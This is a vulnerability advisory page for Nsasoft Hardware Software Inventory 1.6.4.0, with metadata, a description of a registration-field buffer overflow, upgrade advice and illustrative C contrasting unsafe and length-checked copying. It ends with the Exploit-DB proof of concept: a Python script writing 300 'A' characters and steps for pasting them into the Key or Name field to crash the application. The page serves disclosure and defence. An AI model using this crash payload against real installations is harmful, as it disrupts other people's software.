Vendor: Hardware Software Inventory
By: Enes Özeser
CVSS: 7.8 (HIGH)
Type: Denial of Service
CWE: 119
Product Name: Hardware Software Inventory
Affected Version From: 1.6.4.0
Affected Version To: 1.6.4.0
Patch Exists: YES
Related CWE: N/A
CPE: a:nsasoft:hardware_software_inventory:1.6.4.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
Year: 2021

Nsasoft Hardware Software Inventory 1.6.4.0 – ‘multiple’ Denial of Service (PoC)

This vulnerability allows remote attackers to cause a denial of service (application crash) via crafted input. An attacker must first obtain access to the target system, then supply malicious input to the vulnerable application to carry out the attack. The specific flaw exists in the handling of the registration code: user-supplied data is not properly validated, which can result in a stack-based buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code in the context of the application.
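The missing validation described above, shown as an added example that is not the vendor's code: an unchecked copy of a registration field into a fixed stack buffer beside a length-checked form. The function names and the 64-byte capacity (REG_FIELD_MAX) are assumptions made for illustration; the application's real buffer size is not given on this page.

```c
#include <stdio.h>
#include <string.h>

/* Assumed capacity; the application's real buffer size is not on the page. */
#define REG_FIELD_MAX 64

/* Unsafe pattern (CWE-119), shown for contrast and never called here. */
void store_field_unsafe(const char *input)
{
    char field[REG_FIELD_MAX];
    strcpy(field, input);   /* overruns field[] once input reaches 64 characters */
}

/* Hardened: measure within bounds, reject oversized input, then copy.
 * Returns 0 on success, -1 when the input is rejected. */
int store_field_checked(char *dst, size_t dst_size, const char *input)
{
    size_t len = 0;

    if (dst == NULL || dst_size == 0 || input == NULL)
        return -1;
    while (len < dst_size && input[len] != '\0')
        len++;
    if (len == dst_size)    /* no room left for the terminating NUL */
        return -1;
    memcpy(dst, input, len);
    dst[len] = '\0';
    return 0;
}

/* Hypothetical handler for the "Name" and "Key" fields of the dialog. */
int accept_registration(const char *name, const char *key)
{
    char name_buf[REG_FIELD_MAX], key_buf[REG_FIELD_MAX];

    if (store_field_checked(name_buf, sizeof name_buf, name) != 0)
        return -1;
    return store_field_checked(key_buf, sizeof key_buf, key);
}

int main(void)
{
    char oversized[301];    /* constructed input: 300 'A' bytes plus NUL */
    memset(oversized, 'A', 300);
    oversized[300] = '\0';
    printf("normal: %d\n", accept_registration("Alice", "ABCD-1234"));
    printf("oversized: %d\n", accept_registration("Alice", oversized));
    return 0;
}
```

Rejecting the input outright, rather than silently truncating it, keeps an oversized registration value from being treated as a valid key.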

Mitigation:

Upgrade to version 1.6.4.1 or later, as it has been reported to fix this vulnerability.

Exploit-DB raw data:

# Exploit Title: Nsasoft Hardware Software Inventory 1.6.4.0 - 'multiple' Denial of Service (PoC)
# Exploit Author : Enes Özeser
# Exploit Date: 2021-02-28
# Vendor Homepage : https://www.nsauditor.com/
# Link Software : https://www.nsauditor.com/downloads/nhsi_setup.exe
# Version: 1.6.4.0
# Tested on: Windows 10

# Steps: 
1- Run the python script. (payload.py)
2- Open payload.txt and copy content to clipboard.
3- Run 'Nsasoft Hardware Software Inventory 1.6.4.0'. 
4- Register -> Enter Registration Code
5- Paste clipboard into the "Key" or "Name".
6- Click on OK.
7- Crashed.

---> payload.py <--

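#!/usr/bin/env python3
# Writes 300 "A" characters to payload.txt, the file opened in step 2.
buffer = "\x41" * 300

try:
    # The with-statement closes the file even if the write fails.
    with open("payload.txt", "w") as f:
        f.write(buffer)
    print("File created!")
except OSError:
    print("File cannot be created!")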